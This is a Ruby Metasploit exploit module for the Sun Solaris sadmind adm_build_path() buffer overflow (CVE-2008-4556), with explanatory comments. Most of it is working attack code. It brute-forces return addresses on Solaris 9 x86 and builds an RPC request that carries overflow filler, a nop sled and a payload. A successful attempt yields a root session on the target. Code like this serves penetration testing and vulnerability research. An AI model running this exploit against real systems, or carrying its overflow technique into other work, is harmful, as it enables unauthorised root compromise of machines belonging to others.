##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
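class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::SunRPC
  include Msf::Exploit::Brute

  # RPC program number and version under which sadmind registers with the
  # portmapper; both the check and the exploit look the service up by them.
  SADMIND_PROGRAM = 100232
  SADMIND_VERSION = 10

  # Byte count of the filler that precedes the return address inside the
  # ADM_METHOD argument (the overflow distance used by the original module).
  METHOD_FILLER_LENGTH = 1017

  # Per-attempt RPC timeout in seconds. Kept short because a successful (or
  # crashing) attempt never answers and the Brute mixin has many addresses to try.
  BRUTE_CALL_TIMEOUT = 2

  # Module metadata.
  #
  # Targets: the first one walks a return-address range with the Brute mixin;
  # its 30 KiB step is smaller than its 32 KiB nop sled, so consecutive attempts
  # overlap and the address need only land somewhere in the sled. The second
  # target is a single fixed address, and 'Debug' sends a sentinel address that
  # is only useful for watching the crash in a debugger.
  #
  # Each failed attempt is expected to kill sadmind (Stability note); inetd
  # respawns it per the description, which is what makes brute forcing viable.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sun Solaris sadmind adm_build_path() Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow vulnerability in adm_build_path()
          function of Sun Solstice AdminSuite sadmind daemon.

          The distributed system administration daemon (sadmind) is the daemon used by
          Solstice AdminSuite applications to perform distributed system administration
          operations.

          The sadmind daemon is started automatically by the inetd daemon whenever a
          request to invoke an operation is received. The sadmind daemon process
          continues to run for 15 minutes after the last request is completed, unless a
          different idle-time is specified with the -i command line option. The sadmind
          daemon may be started independently from the command line, for example, at
          system boot time. In this case, the -i option has no effect; sadmind continues
          to run, even if there are no active requests.
        },
        'Author' => [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
        ],
        'Platform' => 'solaris',
        'References' => [
          ['CVE', '2008-4556'],
          ['OSVDB', '49111'],
          ['URL', 'https://web.archive.org/web/20081201000000*/https://risesecurity.org/advisories/RISE-2008001.txt'],
        ],
        # sadmind runs as root; a successful session is privileged.
        'Privileged' => true,
        'License' => MSF_LICENSE,
        'Payload' => {
          'Space' => 1024,
          'BadChars' => "\x00"
        },
        'Targets' => [
          [
            'Sun Solaris 9 x86 Brute Force',
            {
              'Arch' => [ ARCH_X86 ],
              'Platform' => 'solaris',
              'Nops' => 1024 * 32,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x08062030 },
                'Stop' => { 'Ret' => 0x08072030 },
                'Step' => 1024 * 30
              }
            }
          ],
          [
            'Sun Solaris 9 x86',
            {
              # Declared explicitly so payload selection is constrained to x86
              # exactly as it is for the brute-force target above.
              'Arch' => [ ARCH_X86 ],
              'Platform' => 'solaris',
              'Nops' => 1024 * 4,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x08066a60 + 2048 },
                'Stop' => { 'Ret' => 0x08066a60 + 2048 },
                'Step' => 1
              }
            }
          ],
          [
            'Debug',
            {
              'Arch' => [ ARCH_X86 ],
              'Platform' => 'solaris',
              'Nops' => 1024 * 4,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xaabbccdd },
                'Stop' => { 'Ret' => 0xaabbccdd },
                'Step' => 1
              }
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2008-10-14',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_RESTARTS],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
  end

  # Asks the target's portmapper whether sadmind is registered.
  #
  # A registration only proves the service is present, not that it is the
  # vulnerable build, so the strongest answer is Detected. A portmap timeout or
  # RPC error is reported as Unknown (with the error under -v) instead of
  # propagating, matching how brute_exploit treats the same exceptions.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    port = sunrpc_create('udp', SADMIND_PROGRAM, SADMIND_VERSION)
    port.nil? ? CheckCode::Safe : CheckCode::Detected
  rescue Rex::Proto::SunRPC::RPCTimeout, Rex::Proto::SunRPC::RPCError => e
    vprint_error(e.to_s)
    CheckCode::Unknown
  ensure
    sunrpc_destroy unless rpcobj.nil?
  end

  # Brute-force callback: one exploitation attempt per candidate return address.
  #
  # The Brute mixin calls this for every 'Ret' in the selected target's
  # Bruteforce range. An RPC timeout on the call itself is the expected outcome
  # (the daemon either runs the payload or crashes and never replies).
  #
  # @param brute_target [Hash] the current attempt's parameters, 'Ret' in particular
  # @return [void]
  def brute_exploit(brute_target)
    begin
      sunrpc_create('udp', SADMIND_PROGRAM, SADMIND_VERSION)
    rescue Rex::Proto::SunRPC::RPCTimeout, Rex::Proto::SunRPC::RPCError => e
      vprint_error(e.to_s)
      return
    end

    # Built once and reused across attempts (see nop_block).
    nops = nop_block

    print_status('Trying to exploit sadmind with address 0x%.8x...' % brute_target['Ret'])

    request = build_request(brute_target['Ret'], nops)

    begin
      # two seconds timeout for brute force
      sunrpc_call(1, request, BRUTE_CALL_TIMEOUT)
    rescue Rex::Proto::SunRPC::RPCTimeout
      print_status('Server did not respond, this is expected')
    rescue Rex::Proto::SunRPC::RPCError => e
      print_error(e.to_s)
    end
  ensure
    sunrpc_destroy unless rpcobj.nil?
  end

  # Encodes one string-valued ADM argument.
  #
  # The field layout (name, 9, length + 1, value, 0, 0) is reproduced from the
  # original module; the 9 looks like the ADM type tag for strings, but that is
  # not established here. The length counts a trailing NUL that is not itself
  # appended to the value.
  #
  # @param str1 [String] argument name
  # @param str2 [String] argument value
  # @return [String] XDR-encoded field
  def do_string(str1, str2)
    Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
  end

  # Encodes one integer-valued ADM argument.
  #
  # Layout (name, 3, 4, value, 0, 0) reproduced from the original module; the 3
  # presumably tags an int and the 4 is its byte size -- not confirmed here.
  #
  # @param str [String] argument name
  # @param int [Integer] argument value
  # @return [String] XDR-encoded field
  def do_int(str, int)
    Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)
  end

  private

  # Returns the nop sled for the selected target, building it on first use.
  #
  # Memoised in @nops so the sled (and the "Creating nop block..." message) is
  # produced once per run rather than once per brute-force attempt. An empty
  # string is also memoised, since '' is truthy in Ruby.
  #
  # @return [String]
  def nop_block
    return @nops if @nops

    print_status('Creating nop block...')
    @nops = target['Nops'] > 0 ? make_nops(target['Nops']) : ''
  end

  # Assembles the sadmind request that carries the overflow.
  #
  # @param ret  [Integer] candidate return address for this attempt
  # @param nops [String]  nop sled placed in front of the payload
  # @return [String] request passed to sunrpc_call
  def build_request(ret, nops)
    hostname = 'localhost'

    # ADM_METHOD is the overflowing argument: filler, then the return address.
    # The address is packed explicitly little-endian ('V') because every target
    # is x86. The previous 'L' used the *attacker's* host byte order, which only
    # happens to be right when Metasploit itself runs on a little-endian machine.
    # method = rand_text_alpha(METHOD_FILLER_LENGTH) + [ret].pack('V')
    method = ('A' * METHOD_FILLER_LENGTH) + [ret].pack('V')

    # Where execution lands: the nop sled followed by the encoded payload.
    landing = nops + payload.encoded

    # Request header. Seven zero words followed by the field list from the
    # original module: 0x7f000001 is 127.0.0.1 and the program/version pairs are
    # sadmind's. The meaning of the remaining constants is not documented here;
    # consult the RISE advisory before altering them.
    header = Rex::Encoder::XDR.encode(0) * 7
    header << Rex::Encoder::XDR.encode(
      6, 0, 0, 0, 4, 0, 4, 0x7f000001, SADMIND_PROGRAM, SADMIND_VERSION,
      4, 0x7f000001, SADMIND_PROGRAM, SADMIND_VERSION, 17, 30, 0, 0, 0, 0,
      hostname, 'system', rand_text_alpha(16)
    )

    # Named ADM arguments, terminated by the 'netmgt_endofargs' marker. The
    # 'X' argument is simply a place to put the sled and payload.
    body =
      do_int('ADM_FW_VERSION', 1) +
      do_string('ADM_LANG', 'C') +
      do_string('ADM_REQUESTID', '00009:000000000:0') +
      do_string('ADM_CLASS', 'system') +
      do_string('ADM_CLASS_VERS', '2.1') +
      do_string('ADM_METHOD', method) +
      do_string('ADM_HOST', hostname) +
      do_string('ADM_CLIENT_HOST', hostname) +
      do_string('ADM_CLIENT_DOMAIN', '') +
      do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
      do_int('ADM_FENCE', 0) +
      do_string('X', landing) +
      Rex::Encoder::XDR.encode('netmgt_endofargs')

    # A length word sits between header and body. The 326 adjustment is carried
    # over from the original module; presumably it discounts fixed header bytes,
    # but that is not established here -- verify against the advisory before
    # changing it.
    header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body
  end
end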